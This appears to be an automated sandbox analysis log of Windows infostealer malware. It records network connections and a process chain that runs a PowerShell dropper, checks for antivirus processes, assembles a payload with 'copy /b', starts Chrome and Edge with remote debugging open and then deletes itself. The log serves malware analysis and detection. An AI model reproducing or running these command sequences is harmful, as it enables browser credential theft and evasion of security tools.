    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
    Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64416
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64419
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64413
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64412
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64415
    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64429
    Source: unknownNetwork traffic detected: HTTP traffic on port 64412 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64421
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64425
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
    Source: unknownNetwork traffic detected: HTTP traffic on port 64425 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64439
    Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64419 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64436
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64439 -> 443
    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.121.235.167:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49796 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.5:49804 version: TLS 1.2
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004050CD
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_004044A5

    System Summary

    barindex
    Powershell drops PE file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,5_2_00403883
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeFile created: C:\Windows\NewtonMetallicJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeFile created: C:\Windows\ArchQuotedJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeFile created: C:\Windows\ConsidersFallsJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeFile created: C:\Windows\ConvictionSuggestingJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeFile created: C:\Windows\SwitchObserverJump to behavior
    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_0040497C5_2_0040497C
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_00406ED25_2_00406ED2
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_004074BB5_2_004074BB
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: String function: 004062A3 appears 57 times
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winPS1@110/314@32/21
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_004044A5
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeCode function: 5_2_004024FB CoCreateInstance,5_2_004024FB
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\TreesJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x53s2dy2.z1j.ps1Jump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: y5ppzmgln.17.dr, d2djecbiw.17.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES27E7.tmp" "c:\Users\user\AppData\Local\Temp\l2xn2zg1\CSC17118CCF1564C5291822499255B405E.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe "C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe"
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 164676
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Grab
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "slovenia" Contractors
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 164676\Stopped.com + Zero + Refugees + Severe + Removal + Differential + Mph + Increasingly + Born + Convinced + Passenger 164676\Stopped.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Furnished + ..\Relative + ..\Calgary + ..\Pour + ..\Halfcom + ..\Nj + ..\Capitol + ..\Firewire + ..\Trees h
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com Stopped.com h
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2316,i,2421533482498937402,17485656150599773384,262144 /prefetch:8
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2612,i,12049331983733306251,11913654916641555052,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2016,i,7658775566138034046,42518589343975993,262144 /prefetch:3
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=2524,i,1638855310437427533,11522752701638102957,262144 /prefetch:3
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6928 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:8
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com" & rd /s /q "C:\ProgramData\dj5xt" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe "C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES27E7.tmp" "c:\Users\user\AppData\Local\Temp\l2xn2zg1\CSC17118CCF1564C5291822499255B405E.TMP"Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 164676Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E GrabJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "slovenia" Contractors Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 164676\Stopped.com + Zero + Refugees + Severe + Removal + Differential + Mph + Increasingly + Born + Convinced + Passenger 164676\Stopped.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Furnished + ..\Relative + ..\Calgary + ..\Pour + ..\Halfcom + ..\Nj + ..\Capitol + ..\Firewire + ..\Trees hJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com Stopped.com hJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com" & rd /s /q "C:\ProgramData\dj5xt" & exitJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2316,i,2421533482498937402,17485656150599773384,262144 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2612,i,12049331983733306251,11913654916641555052,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2016,i,7658775566138034046,42518589343975993,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=2524,i,1638855310437427533,11522752701638102957,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6928 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:8
